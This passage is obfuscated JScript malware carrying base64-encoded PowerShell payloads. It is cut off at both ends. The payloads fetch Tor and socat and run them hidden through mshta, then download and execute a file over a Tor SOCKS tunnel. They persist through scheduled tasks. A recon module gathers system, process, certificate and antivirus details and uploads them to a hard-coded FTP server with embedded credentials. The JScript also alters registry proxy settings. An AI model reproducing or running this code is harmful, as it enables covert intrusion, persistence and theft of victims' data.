"cl0kX30pKTsKfQpmdW5jdGlvbiBJbml0U2NoZWR1bGxlcnsKICAgIHRyeXsKICAgICAgICBJbXBvcnQtTW9kdWxlIFNjaGVkdWxlZFRhc2tzIC1FcnJvckFjdGlvbiBTdG9wOwogICAgICAgIHJldHVybiAkU0hfVFlQRV9TQ0hFRFVMRURfVEFTSzsKICAgIH1jYXRj"+
"aHsKICAgICAgICAkRmlsZT0kZW52OlRlbXArJ1wnKyhSYW5kb21TdHJpbmcpKycuemlwJzsKICAgICAgICAkRGVzdD0kZW52OlRlbXArJ1wnKyhSYW5kb21TdHJpbmcpOwogICAgICAgIHdoaWxlICghKGlHZ1JMY3lJSlFCenJBICdodHRwczovL2FwaS5udWdldC5v"+
"cmcvcGFja2FnZXMvdGFza3NjaGVkdWxlci4yLjUuMjMubnVwa2cnICRGaWxlKSkge30KICAgICAgICBpZiAoKFRlc3QtUGF0aCAkRGVzdCkgLWVxIDEpe1JlbW92ZS1JdGVtIC1Gb3JjZSAtUmVjdXJzZSAkRGVzdDt9bWtkaXIgJERlc3QgfCBPdXQtTnVsbDsKICAg"+
"ICAgICBGVlJDbHNnZ01SQVogJEZpbGUgJERlc3Q7CiAgICAgICAgUmVtb3ZlLUl0ZW0gLUZvcmNlICRGaWxlOwogICAgICAgICRUU0Fzc2VtYmx5PSREZXN0KydcbGliXG5ldDIwXE1pY3Jvc29mdC5XaW4zMi5UYXNrU2NoZWR1bGVyLmRsbCc7CiAgICAgICAgJGxv"+
"YWRMaWIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkRmlsZSgkVFNBc3NlbWJseSk7CiAgICAgICAgcmV0dXJuICRTSF9UWVBFX1RBU0tfU0NIRURVTEVSOwogICAgfQp9CmZ1bmN0aW9uIHhybk9scmoKewpwYXJhbShbc3RyaW5nXSRuYW1lLCBb"+
"c3RyaW5nXSRjbWQsIFtzdHJpbmddJHBhcmFtcz0nJyxbaW50XSRyZXN0YXJ0PTAsW2ludF0kZGVsYXk9MCxbc3RyaW5nXSRkaXI9JycpOwpzd2l0Y2ggKCRzY2hlZHVsZXJUeXBlKSB7CiAgICAkU0hfVFlQRV9TQ0hFRFVMRURfVEFTSyB7CiAgICAgICAgJEFjdGlv"+
"biA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICRjbWQ7CiAgICAgICAgaWYoLU5vdCBbU3RyaW5nXTo6SXNOdWxsT3JFbXB0eSgkcGFyYW1zKSl7CiAgICAgICAgICAgICRBY3Rpb24uQXJndW1lbnRzPSRwYXJhbXM7CiAgICAgICAgfQogICAgICAg"+
"IGlmKC1Ob3QgW1N0cmluZ106OklzTnVsbE9yRW1wdHkoJGRpcikpewogICAgICAgICAgICAkQWN0aW9uLldvcmtpbmdEaXJlY3Rvcnk9JGRpcjsKICAgICAgICB9CiAgICAgICAgJExvZ29uVHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtQXRMb2dP"+
"bjsKICAgICAgICB0cnl7CiAgICAgICAgICAgICRMb2dvblRyaWdnZXIuVXNlcklkPSRlbnY6dXNlcm5hbWU7CiAgICAgICAgfWNhdGNoewogICAgICAgICAgICAkTG9nb25UcmlnZ2VyLlVzZXI9JGVudjp1c2VybmFtZTsKICAgICAgICB9CiAgICAgICAgaWYoLU5v"+
"dCAkZGVsYXkgLWVxIDApewogICAgICAgICAgICAkTG9nb25UcmlnZ2VyLkRlbGF5PU5ldy1UaW1lU3BhbiAtU2Vjb25kcyAkZGVsYXk7CiAgICAgICAgfQogICAgICAgIGlmKCRyZXN0YXJ0IC1lcSAxKXsKICAgICAgICAgICAgJFRpbWVUcmlnZ2VyID0gTmV3LVNj"+
"aGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAxMmFtIC1SZXBldGl0aW9uSW50ZXJ2YWwgKFtTeXN0ZW0uVGltZVNwYW5dOjpGcm9tTWludXRlcygxKSkgLVJlcGV0aXRpb25EdXJhdGlvbiAoW1N5c3RlbS5UaW1lU3Bhbl06OkZyb21EYXlzKDM2NSAqIDIwKSk7"+
"CiAgICAgICAgfQogICAgICAgICRTZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQ7CiAgICAgICAgJFNldHRpbmdzLkRpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzID0gJEZhbHNlOwogICAgICAgICRTZXR0aW5ncy5TdG9wSWZHb2luZ09uQmF0"+
"dGVyaWVzID0gJEZhbHNlOwogICAgICAgIGlmKCRyZXN0YXJ0IC1lcSAxKXsKICAgICAgICAgICAgJFRhc2sgPSBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1BY3Rpb24gJEFjdGlvbiAtVHJpZ2dlciAkTG9nb25UcmlnZ2VyLCRUaW1lVHJpZ2dlciAtU2V0dGluZ3Mg"+
"JFNldHRpbmdzIC1UYXNrTmFtZSAkbmFtZSAtRGVzY3JpcHRpb24gKFJhbmRvbVN0cmluZyk7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICRUYXNrID0gUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtQWN0aW9uICRBY3Rpb24gLVRyaWdnZXIgJExvZ29uVHJpZ2dl"+
"ciAtU2V0dGluZ3MgJFNldHRpbmdzIC1UYXNrTmFtZSAkbmFtZSAtRGVzY3JpcHRpb24gKFJhbmRvbVN0cmluZyk7CiAgICAgICAgfQogICAgICAgIFN0YXJ0LVNjaGVkdWxlZFRhc2sgLUlucHV0T2JqZWN0ICRUYXNrOwogICAgfTsKICAgIERlZmF1bHQgewogICAg"+
"ICAgICR0cz1OZXctT2JqZWN0IE1pY3Jvc29mdC5XaW4zMi5UYXNrU2NoZWR1bGVyLlRhc2tTZXJ2aWNlOwogICAgICAgICR0ZD0kdHMuTmV3VGFzaygpOwogICAgICAgICR0ZC5SZWdpc3RyYXRpb25JbmZvLkRlc2NyaXB0aW9uID0gKFJhbmRvbVN0cmluZyk7CiAg"+
"ICAgICAgJHRkLlNldHRpbmdzLkRpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzID0gJEZhbHNlOwogICAgICAgICR0ZC5TZXR0aW5ncy5TdG9wSWZHb2luZ09uQmF0dGVyaWVzID0gJEZhbHNlOwogICAgICAgICR0ZC5TZXR0aW5ncy5NdWx0aXBsZUluc3RhbmNlcyA9"+
"IFtNaWNyb3NvZnQuV2luMzIuVGFza1NjaGVkdWxlci5UYXNrSW5zdGFuY2VzUG9saWN5XTo6SWdub3JlTmV3OwogICAgICAgICRMb2dvblRyaWdnZXIgPSBOZXctT2JqZWN0IE1pY3Jvc29mdC5XaW4zMi5UYXNrU2NoZWR1bGVyLkxvZ29uVHJpZ2dlcjsKICAgICAg"+
"ICAkTG9nb25UcmlnZ2VyLlN0YXJ0Qm91bmRhcnk9W1N5c3RlbS5EYXRlVGltZV06Ok5vdzsKICAgICAgICAkTG9nb25UcmlnZ2VyLlVzZXJJZD0kZW52OnVzZXJuYW1lOwogICAgICAgICRMb2dvblRyaWdnZXIuRGVsYXk9W1N5c3RlbS5UaW1lU3Bhbl06OkZyb21T"+
"ZWNvbmRzKCRkZWxheSk7CiAgICAgICAgJHRkLlRyaWdnZXJzLkFkZCgkTG9nb25UcmlnZ2VyKTsKICAgICAgICBpZigkcmVzdGFydCAtZXEgMSl7CiAgICAgICAgJFRpbWVUcmlnZ2VyID0gTmV3LU9iamVjdCBNaWNyb3NvZnQuV2luMzIuVGFza1NjaGVkdWxlci5U"+
"aW1lVHJpZ2dlcjsKICAgICAgICAkVGltZVRyaWdnZXIuU3RhcnRCb3VuZGFyeT1bU3lzdGVtLkRhdGVUaW1lXTo6Tm93OwogICAgICAgICRUaW1lVHJpZ2dlci5SZXBldGl0aW9uLkludGVydmFsPVtTeXN0ZW0uVGltZVNwYW5dOjpGcm9tTWludXRlcygxKTsKICAg"+
"ICAgICAkVGltZVRyaWdnZXIuUmVwZXRpdGlvbi5TdG9wQXREdXJhdGlvbkVuZD0kRmFsc2U7CiAgICAgICAgJHRkLlRyaWdnZXJzLkFkZCgkVGltZVRyaWdnZXIpOwogICAgICAgIH0KICAgICAgICAkdHNmPSJNaWNyb3NvZnQuV2luMzIuVGFza1NjaGVkdWxlciI7"+
"CiAgICAgICAgJEV4ZWNBY3Rpb249TmV3LU9iamVjdCAiJHRzZi5FeGVjQWN0aW9uIigkY21kLCRwYXJhbXMsJGRpcik7CiAgICAgICAgJHRkLkFjdGlvbnMuQWRkKCRFeGVjQWN0aW9uKTsKICAgICAgICAkdGFzaz0kdHMuUm9vdEZvbGRlci5SZWdpc3RlclRhc2tE"+
"ZWZpbml0aW9uKCRuYW1lLCAkdGQpOwogICAgICAgICR0YXNrLlJ1bigpOwogICAgfTsKfQp9CmZ1bmN0aW9uIGlHZ1JMY3lJSlFCenJBIHsKICAgIHBhcmFtKFtzdHJpbmddJEFFVExjbml0S25hTnFyLCBbc3RyaW5nXSRhRW50c0JNdHNheUIpOwogICAgJEVycm9y"+
"QWN0aW9uUHJlZmVyZW5jZSA9ICJTdG9wIjsKICAgIFdyaXRlLUhvc3QgKCJEb3dubG9hZCB7MH0gdG8gezF9IiAtZiAoJEFFVExjbml0S25hTnFyLCAkYUVudHNCTXRzYXlCKSk7CiAgICB0cnkgewogICAgICAgIFN0YXJ0LUJpdHNUcmFuc2ZlciAtU291cmNlICRB"+
"RVRMY25pdEtuYU5xciAtRGVzdGluYXRpb24gJGFFbnRzQk10c2F5QjsKICAgIH0KICAgIGNhdGNoIHsKICAgICAgICAjV3JpdGUtRXJyb3IgJF8gLUVycm9yQWN0aW9uIENvbnRpbnVlOwogICAgICAgIHRyeSB7CiAgICAgICAgICAgIChOZXctT2JqZWN0IFN5c3Rl"+
"bS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJEFFVExjbml0S25hTnFyLCRhRW50c0JNdHNheUIpOwogICAgICAgIH0KICAgICAgICBjYXRjaCB7CiAgICAgICAgICAgICNXcml0ZS1FcnJvciAkXyAtRXJyb3JBY3Rpb24gQ29udGludWU7CiAgICAgICAgICAg"+
"IFN0YXJ0LVByb2Nlc3MgImNtZC5leGUiIC1Bcmd1bWVudExpc3QgIi9iIC9jIGJpdHNhZG1pbiAvdHJhbnNmZXIgL2Rvd25sb2FkIC9wcmlvcml0eSBISUdIIGAiJEFFVExjbml0S25hTnFyYCIgYCIkYUVudHNCTXRzYXlCYCIiIC1XYWl0IC1XaW5kb3dTdHlsZSBI"+
"aWRkZW47CiAgICAgICAgfQogICAgfWZpbmFsbHl7CiAgICAgICAgJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSI7CiAgICB9CiAgICBpZiAoICQoVHJ5IHsgVGVzdC1QYXRoICRhRW50c0JNdHNheUIudHJpbSgpIH0gQ2F0Y2ggeyAkZmFsc2UgfSkp"+
"ewogICAgICAgIHJldHVybiAkdHJ1ZTsKICAgIH0KICAgIHJldHVybiAkZmFsc2U7Cn0KZnVuY3Rpb24gSXdvUE1jewokc2NoZWR1bGVyVHlwZSA9IEluaXRTY2hlZHVsbGVyOwokdGY9JGVudjpUZW1wKydcJysoUmFuZG9tU3RyaW5nKSsnLnppcCc7CiREZXN0VFA9"+
"JGVudjpBTExVU0VSU1BST0ZJTEUrJ1wnKyhSYW5kb21TdHJpbmcpOwokVG9yTWlycm9ycz1AKCJodHRwczovL2Rpc3QudG9ycHJvamVjdC5vcmcvIiwKImh0dHBzOi8vdG9ycHJvamVjdC5taXJyb3IubWV0YWxnYW1lci5ldS9kaXN0LyIsCiJodHRwczovL3Rvci55"+
"YnRpLm5ldC9kaXN0LyIpOwpmb3JlYWNoICgkbWlycm9yIGluICRUb3JNaXJyb3JzKSB7CiAgICAkX3VybD0kbWlycm9yKyd0b3Jicm93c2VyLzcuMC4xMS90b3Itd2luMzItMC4zLjEuOS56aXAnOwogICAgaWYoKGlHZ1JMY3lJSlFCenJBICRfdXJsICR0Zikpewog"+
"ICAgICAgIGJyZWFrOwogICAgfQp9CmlmICgoVGVzdC1QYXRoICREZXN0VFApIC1lcSAxKXtSZW1vdmUtSXRlbSAtRm9yY2UgLVJlY3Vyc2UgJERlc3RUUDt9bWtkaXIgJERlc3RUUCB8IE91dC1OdWxsOwpGVlJDbHNnZ01SQVogJHRmICREZXN0VFA7ClJlbW92ZS1J"+
"dGVtIC1Gb3JjZSAkdGY7CiR5a0Y9JERlc3RUUCsnXFRvclwnOwokV3FQZnY9InZic2NyaXB0OmNsb3NlKENyZWF0ZU9iamVjdChgIldTY3JpcHQuU2hlbGxgIikuUnVuKGAidG9yLmV4ZWAiLDAsRmFsc2UpKSI7Cnhybk9scmogKFJhbmRvbVN0cmluZykgJ21zaHRh"+
"LmV4ZScgJFdxUGZ2IDAgMCAkeWtGOwokU0ZpbGU9JGVudjpUZW1wKydcJysoUmFuZG9tU3RyaW5nKSsnLnppcCc7CndoaWxlICghKGlHZ1JMY3lJSlFCenJBICdodHRwczovL2dpdGh1Yi5jb20vU3R1ZGlvRXRyYW5nZS9zb2NhdC13aW5kb3dzL2FyY2hpdmUvMS43"+
"LjIuMS56aXAnICRTRmlsZSkpe30KRlZSQ2xzZ2dNUkFaICRTRmlsZSAkRGVzdFRQOwokc19vbGQ9JERlc3RUUCsnXHNvY2F0LXdpbmRvd3MtMS43LjIuMVwnOwokc19uZXc9KFJhbmRvbVN0cmluZyk7ClJlbW92ZS1JdGVtIC1Gb3JjZSAkU0ZpbGU7ClJlbmFtZS1J"+
"dGVtIC1wYXRoICRzX29sZCAtbmV3TmFtZSAkc19uZXc7CiRkTGtkT2R2cz0kRGVzdFRQKydcJyskc19uZXcrJ1wnOwokczFjbWQ9J3NvY2F0IHRjcDQtTElTVEVOOjU1NTUscmV1c2VhZGRyLGZvcmssa2VlcGFsaXZlLGJpbmQ9MTI3LjAuMC4xIFNPQ0tTNEE6MTI3"+
"LjAuMC4xOiVET01BSU4lOjgwLHNvY2tzcG9ydD05MDUwJzsKJHMyY21kPSdzb2NhdCB0Y3A0LUxJU1RFTjo1NTg4LHJldXNlYWRkcixmb3JrLGtlZXBhbGl2ZSxiaW5kPTEyNy4wLjAuMSBTT0NLUzRBOjEyNy4wLjAuMTolRE9NQUlOJTo1NTg4LHNvY2tzcG9ydD05"+
"MDUwJzsKJFN5QVN4Vj0idmJzY3JpcHQ6Y2xvc2UoQ3JlYXRlT2JqZWN0KGAiV1NjcmlwdC5TaGVsbGAiKS5SdW4oYCIkczFjbWRgIiwwLEZhbHNlKSkiOwokQ2tlSGFFTW9RYj0idmJzY3JpcHQ6Y2xvc2UoQ3JlYXRlT2JqZWN0KGAiV1NjcmlwdC5TaGVsbGAiKS5S"+
"dW4oYCIkczJjbWRgIiwwLEZhbHNlKSkiOwp4cm5PbHJqIChSYW5kb21TdHJpbmcpICdtc2h0YS5leGUnICRTeUFTeFYgMCAwICRkTGtkT2R2czsKeHJuT2xyaiAoUmFuZG9tU3RyaW5nKSAnbXNodGEuZXhlJyAkQ2tlSGFFTW9RYiAwIDAgJGRMa2RPZHZzOwokd1hk"+
"UmJDRnduPSJ2YnNjIisicmlwdDpjbG9zZShDcmVhdGVPYmplY3QoYCJXU2NyaXB0LlNoZWxsYCIpLlJ1bihgInBvd2Vyc2hlbGwuZXhlIGAiYCJgJEY9YCRlbnY6VGVtcCsnXFwiKyhSYW5kb21TdHJpbmcpKyIuZXhlJztybSAtRm9yY2UgYCRGO2AkY2w9KE5ldy1P"+
"YmplY3QgTmV0LldlYkNsaWVudCk7YCRjbC5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xMjcuMC4wLjE6NTU1NS8iKyhSYW5kb21TdHJpbmcpKyIuYXNwP3RzJmlwPScrYCRjbC5Eb3dubG9hZGAiK2AiU3RyaW5nKCdodHRwOi8vYXBpLmlwaWZ5Lm9yZy8nKSxgJEYpOyYg"+
"YCRGYCJgImAiLDAsRmFsc2UpKSI7Cnhybk9scmogKFJhbmRvbVN0cmluZykgJ21zaHRhLmV4ZScgJHdYZFJiQ0Z3biAxOwp9Ckl3b1BNYzs=",
    EMAoYeN: "JExvZ2ZpbGUgPSAkZW52OlRlbXArIlxcJChnYyBlbnY6Y29tcHV0ZXJuYW1lKS5sb2ciOwoKRnVuY3Rpb24gTG9nV3JpdGUKewogIFBhcmFtIChbc3RyaW5nXSRsb2dzdHJpbmcpCiAgJGR0PUdldC1EYXRlIC1Gb3JtYXQgImRkLk1NLnl5eXkgSEg6bW06c3MiOwog"+
"ICRtc2c9W3N0cmluZ106OkZvcm1hdCgiW3swfV06Olt7MX1dIiwkZHQsJGxvZ3N0cmluZyk7CiAgV3JpdGUtSG9zdCAkbXNnOwogIEFkZC1jb250ZW50ICRMb2dmaWxlIC12YWx1ZSAkbXNnOwp9CkZ1bmN0aW9uIFVwbG9hZExvZwp7CiAgJGRlc3QgPSAiZnRwOi8v"+
"cmRrdW5kOnJhaW5kYW5jZUBmdHAxLndtLm5ldC91cGQiOwogICR3ZWJjbGllbnQgPSBOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uTmV0LldlYkNsaWVudDsKICAkd2ViY2xpZW50LlVwbG9hZEZpbGUoIiRkZXN0LyQoZ2MgZW52OmNvbXB1dGVybmFtZSkubG9n"+
"IiwgJExvZ2ZpbGUpOwogIFJlbW92ZS1JdGVtIC1QYXRoICRMb2dmaWxlOwp9CmZ1bmN0aW9uIENoZWNrSW5zdGFsbCgpewogICR3aW5pbmZvID0gKEdldC1XbWlPYmplY3QgV2luMzJfT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IENhcHRpb24sIFNlcnZpY2VQYWNr"+
"TWFqb3JWZXJzaW9uLCBPU0FyY2hpdGVjdHVyZSwgVmVyc2lvbiwgTVVJTGFuZ3VhZ2VzKTsKICAkd2luaW5mby5NVUlMYW5ndWFnZXM9JHdpbmluZm8uTVVJTGFuZ3VhZ2VzIC1qb2luICIsIjsKICBMb2dXcml0ZSgiT1MgaW5mbzogezB9IiAtZiAkd2luaW5mbyAt"+
"am9pbiAiIik7CiAgaWYgKHRlc3QtcGF0aCB2YXJpYWJsZTpwc3ZlcnNpb250YWJsZSkgewogICAgJHZlcnNpb24gPSAkcHN2ZXJzaW9udGFibGUucHN2ZXJzaW9uOwogIH0gZWxzZSB7CiAgICAkdmVyc2lvbiA9IFt2ZXJzaW9uXSIxLjAuMC4wIjsKICB9CiAgTG9n"+
"V3JpdGUoIlBvd2Vyc2hlbGwgdmVyc2lvbjogezB9IiAtZiAkdmVyc2lvbik7CiAgdHJ5IHsKICAgICRwYWM9R2V0LUl0ZW1Qcm9wZXJ0eSAnaGtjdTpcU29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXEludGVybmV0IFNldHRpbmdz"+
"XCd8U2VsZWN0IC1leHBhbmQgQXV0b0NvbmZpZ1VSTCAtRXJyb3JBY3Rpb24gU3RvcDsKICAgIExvZ1dyaXRlKCJQYWMgc2V0dGVkOiAnJHBhYyciKTsKICB9CiAgY2F0Y2ggewogICAgTG9nV3JpdGUoIkVSUk9SOiBQYWMgbm90IHNldHRlZCIpOwogIH0KICAkQ2Vy"+
"dHMgPSBAKEdldC1DaGlsZEl0ZW0gY2VydDpcQ3VycmVudFVzZXJcUk9PVHxXaGVyZS1PYmplY3QgeyRfLlN1YmplY3QgLWxpa2UgIipDT01PRE8gUlNBIEV4dGVuZGVkIFZhbGlkYXRpb24gU2VjdXJlIFNlcnZlciBDQSAyKiIgLW9yICRfLlN1YmplY3QgLWxpa2Ug"+
"IipDT01PRE8gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkqIn18Rm9yRWFjaC1PYmplY3QgeyJ7MH0gKHsxfSkiIC1mICgkXy5UaHVtYnByaW50LCRfLk5vdEJlZm9yZSl9KTsKICBpZiAoLU5PVCAkQ2VydHMuY291bnQgLWVxIDApewogICAgTG9nV3JpdGUoIkNlcnRz"+
"IGluc3RhbGxlZDogJ3swfSciIC1mICgkQ2VydHMgLWpvaW4gIjsgIikpOwogIH1lbHNlIHsKICAgIExvZ1dyaXRlKCJDZXJ0cyBub3QgZm91bmQiKTsKICB9CiAgdHJ5ewogICAgJHByb2MgPSBHZXQtUHJvY2VzcyB8IFdoZXJlLU9iamVjdCB7JF8uUHJvY2Vzc05h"+
"bWUgLWxpa2UgInRvcioiIC1vciAkXy5Qcm9jZXNzTmFtZSAtbGlrZSAic29jYXQqIn18U2VsZWN0IC1Qcm9wZXJ0eSBAeyBOYW1lPSJPdXQiOyBFeHByZXNzaW9uPXsiSUQ6ezB9YG5OYW1lOnsxfWBuUGF0aDp7Mn1gbi0tLS0tLS0tLS0tLS0iIC1mICRfLklkLCRf"+
"LlByb2Nlc3NOYW1lLCRfLlBhdGh9fXxTZWxlY3QgLWV4cGFuZCBPdXQ7CiAgICBMb2dXcml0ZSgiUHJvY2Nlc3MgbGlzdDpgbnswfSIgLWYgKCRwcm9jIC1qb2luICJgbiIpKTsKICB9CiAgY2F0Y2ggewogICAgTG9nV3JpdGUoIkVSUk9SOiBDYW4ndCBnZXQgcHJv"+
"Y2Nlc3MgbGlzdCIpOwogIH0KICAkRGVzdFRQPSRlbnY6QUxMVVNFUlNQUk9GSUxFOwogIHRyeXsKICAgICRkaXJzPWRpcigkRGVzdFRQKSAtRXJyb3JBY3Rpb24gU3RvcDsKICAgIExvZ1dyaXRlKCJMaXN0IGRpciBbezB9XTogezF9IiAtZiAoJERlc3RUUCwgKCgk"+
"ZGlyc3xTZWxlY3QgLWV4cGFuZCBOYW1lKSAtam9pbiAiOyAiKSkpOwogICAgZm9yZWFjaCgkZGlyIGluICRkaXJzKXsKICAgICAgICB0cnl7CiAgICAgICAgICAgICRzdWJkaXI9ZGlyKCRkaXIuRnVsbE5hbWUpIC1FcnJvckFjdGlvbiBTdG9wOwogICAgICAgICAg"+
"ICBMb2dXcml0ZSgiTGlzdCBkaXIgW3swfV06ezF9IiAtZiAoJGRpci5GdWxsTmFtZSwgKCgkc3ViZGlyfFNlbGVjdCAtZXhwYW5kIE5hbWUpIC1qb2luICI7ICIpKSk7CiAgICAgICAgfQogICAgICAgIGNhdGNoewogICAgICAgICAgICBMb2dXcml0ZSgiRVJST1I6"+
"IENhbid0IGxpc3QgZGlyIHswfSIgLWYgJGRpci5GdWxsTmFtZSk7CiAgICAgICAgfQogICAgfQogIH0KICBjYXRjaCB7CiAgICBMb2dXcml0ZSgiRVJST1I6IENhbid0IGxpc3QgZGlyIHswfSIgLWYgJERlc3RUUCk7CiAgfQoKICAkYXZsaXN0PShHZXQtV21pT2Jq"+
"ZWN0IC1OYW1lc3BhY2UgInJvb3RcU2VjdXJpdHlDZW50ZXIyIiAtUXVlcnkgIlNFTEVDVCAqIEZST00gQW50aVZpcnVzUHJvZHVjdCIgIEBwc2JvdW5kcGFyYW1ldGVyc3xTZWxlY3QgLWV4cGFuZCBEaXNwbGF5TmFtZSk7CiAgaWYgKC1OT1QgJGF2bGlzdC5jb3Vu"+
"dCAtZXEgMCl7CiAgICBMb2dXcml0ZSgiQXYgaW5zdGFsbGVkOiAnezB9JyIgLWYgKCRhdmxpc3QgLWpvaW4gIjsgIikpOwogIH1lbHNlIHsKICAgIExvZ1dyaXRlKCJBdiBub3QgZm91bmQiKTsKICB9Cn0KZnVuY3Rpb24gU3RhcnRXb3JrKCl7CiAgTG9nV3JpdGUg"+
"IlN0YXJ0IExvZyBtb2R1bGUiOwogIENoZWNrSW5zdGFsbDsKICBVcGxvYWRMb2c7Cn0KU3RhcnRXb3JrOwo="
};
var LbXYsoZotGh={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(e){var t="";var n,r,i,s,o,u,a;var f=0;e=LbXYsoZotGh._utf8_encode(e);while(f<e.length){n=e.charCodeAt(f++);r=e.charCodeAt(f++);i=e.charCodeAt(f++);s=n>>2;o=(n&3)<<4|r>>4;u=(r&15)<<2|i>>6;a=i&63;if(isNaN(r)){u=a=64}else if(isNaN(i)){a=64}t=t+this._keyStr.charAt(s)+this._keyStr.charAt(o)+this._keyStr.charAt(u)+this._keyStr.charAt(a)}return t},nzJryrgLluyiPwC:function(e){var t="";var n,r,i;var s,o,u,a;var f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=this._keyStr.indexOf(e.charAt(f++));o=this._keyStr.indexOf(e.charAt(f++));u=this._keyStr.indexOf(e.charAt(f++));a=this._keyStr.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r)}if(a!=64){t=t+String.fromCharCode(i)}}t=LbXYsoZotGh._utf8_decode(t);return t},_utf8_encode:function(e){e=e.replace(/rn/g,"n");var t="";for(var n=0;n<e.length;n++){var r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r)}else if(r>127&&r<2048){t+=String.fromCharCode(r>>6|192);t+=String.fromCharCode(r&63|128)}else{t+=String.fromCharCode(r>>12|224);t+=String.fromCharCode(r>>6&63|128);t+=String.fromCharCode(r&63|128)}}return t},_utf8_decode:function(e){var t="";var n=0;var r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3}}return t}};
var SGUUmXppVIOh={
    Jer:function(KIp,uIDujligs){
        var OZK = new ActiveXObject("ADODB.Stream");
        OZK.Open();
        OZK.Type=BINARY_STREAM_TYPE;

        var LysWjSbnQFw = new ActiveXObject("ADODB.Recordset");
        var yrHlCecaTbDwO=uIDujligs.length*2;
        LysWjSbnQFw.Fields.Append("data",204,yrHlCecaTbDwO,0x80);
        LysWjSbnQFw.Open();
        LysWjSbnQFw.AddNew();
        LysWjSbnQFw.Fields("data").AppendChunk(uIDujligs);
        LysWjSbnQFw.Update();
        LysWjSbnQFw.MoveFirst();
        var binArray = LysWjSbnQFw("data").GetChunk(yrHlCecaTbDwO);
        LysWjSbnQFw.Close();

        eval("OZK.Wri" + "te(bin"+"Array)");
        OZK.Position=0;

        if(VTU.FileExists(KIp)){
            VTU.DeleteFile(KIp);
        }
        OZK.SaveToFile(KIp);
        OZK.Close();

        var outStreamA = new ActiveXObject("ADODB.Stream");
        var outStreamB = new ActiveXObject("ADODB.Stream");
        outStreamA.Type=TEXT_STREAM_TYPE;
        outStreamB.Type=TEXT_STREAM_TYPE;
        outStreamB.Charset = "ISO-8859-1";
        outStreamA.Open();
        outStreamB.Open();
        outStreamA.LoadFromFile(KIp);
        outStreamA.Position = 0; 
        outStreamA.CopyTo(outStreamB);
        outStreamA.Close();
        outStreamB.SaveToFile(KIp,CREATE_OVERWRITE_SAVE_MODE);
        outStreamB.Close();
    },
    QVn: function(m, n){
        m = parseInt(m,10);
        n = parseInt(n,10);
        return Math.floor(Math.random() * (n - m + 1)) + m;
    },

    PsdPmHMCVqenzuN: function(RWTYk, eOUGCiHno){
    //生成随机文件名,用于命名解密后的ps脚本
        var xgVtJMwJgIjIpu = 0;
        var weFKCALZLcXDGMD = "";
        var KeAR;
        if (eOUGCiHno === undefined) {
            eOUGCiHno = false;
        }
        while (xgVtJMwJgIjIpu < RWTYk) {
            KeAR = (Math.floor((Math.random() * 100)) % 94) + 33;
            if (!eOUGCiHno) {
                if ((KeAR >= 33) && (KeAR <= 47)) {
                    continue;
                }
                if ((KeAR >= 58) && (KeAR <= 64)) {
                    continue;
                }
                if ((KeAR >= 91) && (KeAR <= 96)) {
                    continue;
                }
                if ((KeAR >= 123) && (KeAR <= 126)) {
                    continue;
                }
            }
            xgVtJMwJgIjIpu++;
            weFKCALZLcXDGMD += String.fromCharCode(KeAR);
        }
        return weFKCALZLcXDGMD;
    },
    nahF: function(str){
        return str.replace(/(^\s+)|(\s+$)/g, "");
    }
};
if (!String.format) {
  String.format = function(format) {
    var args = Array.prototype.slice.call(arguments, 1);
    return format.replace(/{(\d+)}/g, function(match, number) { 
      return typeof args[number] != "undefined"
        ? args[number] 
        : match
      ;
    });
  };
}
function pjWBhLWlAGVeKiN(){
    //ps脚本路径
    this.kZNsJyERrbjMEdZ=SGUUmXppVIOh.PsdPmHMCVqenzuN(8)+".ps1";

    this.lNTsAY=function(){
        var iAoIOlPGFpaBof = new ActiveXObject("MSXML2"+".XML"+"HTTP");
        try{
            iAoIOlPGFpaBof.open("GET","http://api.ipify.org/",false);
            iAoIOlPGFpaBof.send();
            if(iAoIOlPGFpaBof.status==200){
                return SGUUmXppVIOh.nahF(iAoIOlPGFpaBof.responseText);
            }
        }catch(e){}
        try{
            iAoIOlPGFpaBof.open("GET","http://icanhazip.com/",false);
            iAoIOlPGFpaBof.send();
            if(iAoIOlPGFpaBof.status==200){
                return SGUUmXppVIOh.nahF(iAoIOlPGFpaBof.responseText);
            }
        }catch(e){}
        return "";
    };

    this.qtPLqwQxQHKKe=function(){
        sZTSiOfmguW.RegWrite(LbXYsoZotGh.nzJryrgLluyiPwC("SEtDV"+"VxTb2Z0d2FyZVxNaWNyb3NvZ"+"nRcV2luZG93c1xDdXJyZW50VmVyc2lvblxJbnRlcm"+"5ldCBTZXR0aW5nc1xBdXRvRGV0ZWN0"),0,"REG_DWORD");

        for(var i=0;i<5;i++){
            var nNxFkACp=this.lNTsAY();
